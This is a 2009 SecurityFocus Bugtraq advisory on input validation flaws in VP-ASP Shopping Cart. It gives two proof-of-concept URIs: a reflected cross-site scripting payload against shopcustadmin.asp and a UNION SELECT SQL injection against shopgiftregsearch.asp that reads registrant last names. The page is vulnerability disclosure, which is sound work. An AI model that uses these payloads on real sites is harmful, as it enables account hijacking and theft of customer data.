Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

VP-ASP Shopping Cart Multiple Input Validation Vulnerabilities

To exploit a cross-site scritping issue:

An attacker can exploit this issue by enticing an unsuspecting user into following a malicious URI.

The following proof-of-concept URI is available:

http://example.com/[path]/shopcustadmin.asp?msg=%3Cscript%3Ealert('x');%3C/script%3E

To exploit an SQL-injection issue:

An attacker can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://example.com/[path]/shopgiftregsearch.asp?LoginLastname='%20union%20select%200,lastname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1







 

Privacy Statement
Copyright 2009, SecurityFocus